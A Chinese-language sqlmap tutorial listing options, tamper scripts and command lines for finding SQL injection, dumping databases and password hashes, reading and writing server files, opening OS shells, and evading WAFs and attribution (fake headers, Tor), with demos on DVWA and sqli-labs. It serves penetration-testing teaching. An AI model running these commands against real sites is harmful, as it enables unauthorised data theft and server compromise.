2025-11-09 15:54:55sqlmap使用教程

sqlmap使用教程

目录sqlmap使用教程1、介绍2、常用参数3、tamper脚本4、使用示例基础使用进阶使用直接使用5、案例演示案例一：使用Sqlmap获取DVWA数据案例二：利用unmagicquotes脚本绕过magicquotes

1、介绍

SQLMAP是一个开放源码的渗透测试工具，它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎，为最终渗透测试人员提供很多强大的功能，可以拖库，可以访问底层的文件系统，还可以通过带外连接执行操作系统上的命令。

2、常用参数

--version #显示程序的版本号并退出

-h, --help #显示此帮助消息并退出

-u #设置目标URL

-p #指定测试参数

-D #指定要进行枚举的数据库名

-U #指定要进行枚举的数据库表

-T #枚举列的信息

-C #指定要进行枚举的数据库列

-U #指定要进行枚举的数据车用户

--current-user #获取当前用户名称

--current-db #获取当前数据库名称

--cookie #设置cookie值

--dbs #列出数据库

--tables #列出数据库中的表

--columns #列出表中的列

--dump #列出表中的字段

--sql-shell #执行SQL命令

--os-cmd #执行系统命令

--os-shell #与系统交互shell

-r #加载外部请求包

--batch #使用默认参数进行

--data=DATA #通过POST发送数据字符串

--level=LEVEL #执行测试的等级（1-5，默认为1)

--risk=RISK #执行测试的风险（O-3，默认为1)

-v VERBOSE #详细级别:0-6(默认为1)

--proxy=PROXY #使用HTTP代理连接到目标URL

--user-agent #指定HTTP User-Agent

--tamper=TAMPER #使用给定的脚本(S)篡改注入数据

--random-agent #随机的请求头!

3、tamper脚本

# 使用方法--tamper xxx.py

apostrophemask.py # 用UTF-8全角字符替换单引号字符

apostrophenullencode.py # 用非法双字节unicode字符替换单引号字符

appendnullbyte.py # 在payload末尾添加空字符编码

base64encode.py # 对给定的payload全部字符使用Base64编码

between.py # 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=”

bluecoat.py # 在SQL语句之后用有效的随机空白符替换空格符，随后用“LIKE”替换等于号“=”

chardoubleencode.py # 对给定的payload全部字符使用双重URL编码（不处理已经编码的字符）

charencode.py # 对给定的payload全部字符使用URL编码（不处理已经编码的字符）

charunicodeencode.py # 对给定的payload的非编码字符使用Unicode URL编码（不处理已经编码的字符）

concat2concatws.py # 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例

equaltolike.py # 用“LIKE”运算符替换全部等于号“=”

greatest.py # 用“GREATEST”函数替换大于号“>”

halfversionedmorekeywords.py # 在每个关键字之前添加MySQL注释

ifnull2ifisnull.py # 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例

lowercase.py # 用小写值替换每个关键字字符

modsecurityversioned.py # 用注释包围完整的查询

modsecurityzeroversioned.py # 用当中带有数字零的注释包围完整的查询

multiplespaces.py # 在SQL关键字周围添加多个空格

nonrecursivereplacement.py # 用representations替换预定义SQL关键字，适用于过滤器

overlongutf8.py # 转换给定的payload当中的所有字符

percentage.py # 在每个字符之前添加一个百分号

randomcase.py # 随机转换每个关键字字符的大小写

randomcomments.py # 向SQL关键字中插入随机注释

securesphere.py # 添加经过特殊构造的字符串

sp_password.py # 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs

space2comment.py # 用“/**/”替换空格符

space2dash.py # 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符

space2hash.py # 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

space2morehash.py # 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

space2mssqlblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符

space2mssqlhash.py # 用磅注释符“#”其次是一个换行符替换空格符

space2mysqlblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符

space2mysqldash.py # 用破折号注释符“--”其次是一个换行符替换空格符

space2plus.py # 用加号“+”替换空格符

space2randomblank.py # 用一组有效的备选字符集当中的随机空白符替换空格符

unionalltounion.py # 用“UNION SELECT”替换“UNION ALL SELECT”

unmagicquotes.py # 用一个多字节组合%bf%27和末尾通用注释一起替换空格符

varnish.py # 添加一个HTTP头“X-originating-IP”来绕过WAF

versionedkeywords.py # 用MySQL注释包围每个非函数关键字

versionedmorekeywords.py # 用MySQL注释包围每个关键字

xforwardedfor.py # 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

4、使用示例

基础使用

1、判断注入点和数据类型：

(1) sqlmap -u http://www.test.php?id=1 #GET方法注入

(2) sqlmap -r /etc/url.txt #POST方法注入(使用Burpsuite等代理工具拦截POST请求内容，将POST请求内容保存在一个文本文件中，此处为url.txt，并用sqlmap调用)

2、判断数据库名(dbs)：sqlmap -u "http://www.test.php?id=1" --dbs

3、判断表名(tables)：sqlmap -u "http://www.test.php?id=1" -D 数据库名 --tables

4、判断列名(columns)：sqlmap -u "http://www.test.php?id=1"-D 数据库名 -T 表名 --column

5、获取字段: sqlmap -u "http://www.test.php?id=1" -D 数据库名 -T 表名 -C 列名 --dump

进阶使用

sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称

sqlmap -u "http://url/news?id=1" --current-db #获取当前数据库名称

sqlmap -u "http://url/news?id=1" --dbs #枚举所有数据库名

sqlmap -u "http://url/news?id=1" -D "db_name" --tables #列出指定数据库的表名

sqlmap -u "http://url/news?id=1" -D "db_name" -T "tablename" --columns #列列出指定数据库对应表的字段

sqlmap -u "http://url/news?id=1" -D "db_name" -T "table_name" -C "column_name" --dump #获取字段内容

sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users #dbms指定数据库类型

sqlmap -u "http://url/news?id=1" --users #列数据车用户

sqlmap -u "http://url/news?id=1" --passwords #数据库用户密码

sqlmap -u "http://url/news?id=1" --sql-shell/--os-cmd #执行指定sql命令

sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令

sqlmap -u "http://url/news?id=1" --os-shell #系统交互shell

sqlmap -u "http://url/news?id=1" --dbs -o"sqImap.log" #保存进度

sqlmap -u "http://url/news?id=1" --dbs -o"sqlmap.log" --resume #恢复已保存进度

sqlmap -u "http://url/news?id=1" --tamper "base64encode.py" #加载脚本(可利用绕过注入限制)

sqlmap -u "http://url/news?id=1" -p id #指定注入参数

sqlmap -u "http://url/news?id=1" --dump-all #爆出该数据库中的所有数据

sqlmap -u "http://url/news?id=1" --proxy="http://127.0.0.1:8080" #指定代理

sqlmap -u "http://url/news?id=1" --delay=3 --force-ssl # 当爆破HTTPS网站会出现超时的话，可以使用参数

sqlmap -u "http://url/news?id=1" --is-dba #判断当前用户是否有管理员权限

sqlmap -u "http://url/news?id=1" --identify-waf # 检测是否有WAF

sqlmap -u "http://url/news?id=1" --file-read "c:/test.txt" #读取目标服务器C盘下的test.txt文件

sqlmap -u "http://url/news?id=1" --file-write test.txt --file-dest "e:/hack.txt" #将本地的test.txt文件上传到目标服务器的E盘下，并且名字为hack.txt

===================================================================================

# 过waf手法

sqlmap -u "http://url/news?id=1"

--random-agent # 使用任意的User-Agent爆破

-v3 # 输出详细度，最大值5会显示请求包和回复包

--threads 5 # 指定线程数

--fresh-queries # 清除缓存

--flush-session # 清空会话，重构注入

--batch # 对所有的交互式的都是默认的

--random-agent # 任意的http头

--tamper "base64encode.py " # 对提交的数据进行base64编码

--referer http://www.baidu.com # 伪造referer字段

--random-agent # 使用任意HTTP头进行绕过，尤其是在WAF配置不当的时候

--time-sec=3 # 使用长的延时来避免触发WAF的机制，这方式比较耗时

--hpp # 使用HTTP 参数污染进行绕过，尤其是在ASP.NET/IIS 平台上

--proxy=http://127.0.0.1:7890 # 使用代理进行绕过

--ignore-proxy # 禁止使用系统的代理，直接连接进行注入

--flush-session # 清空会话，重构注入

--hex 或者 --no-cast # 进行字符码转换

--mobile # 对移动端的服务器进行注入

--tor # 匿名注入

直接使用

python sqlmap.py -u "https://www.vuln.cn/post.php?id=1" --force-ssl --proxy "http://127.0.0.1:7890" --batch --dbs

python sqlmap.py -u "http://www.vuln.cn" –cookie "id=11" --level 2

python sqlmap.py -u "www.xxxx.com/product/detail/id/3*.html" --dbms=mysql -v 3

python sqlmap.py -r "c:\request.txt" -p id –dbms mysql –file-read="e:\www\as\config.php"

5、案例演示

【sqlmap跑post的数据（含cookie）】

案例一：使用Sqlmap获取DVWA数据

dvwa-sql-Low

1、使用BP自带浏览器进行抓包(主要是抓取想要登入的cookie信息)

2、将数据包保存成文件，放入sqlmap目录下

3、加上-r参数带上数据包（如果数据包当中没有cookie信息的话，跑sqlmap时会重定向到登入页面--报浏览器302状态码）

结果就出来了

案例二：利用unmagicquotes脚本绕过magicquotes

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-33/?id=1" --batch --tamper=unmagicquotes

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-33/?id=1" --batch --tamper=unmagicquotes --current-db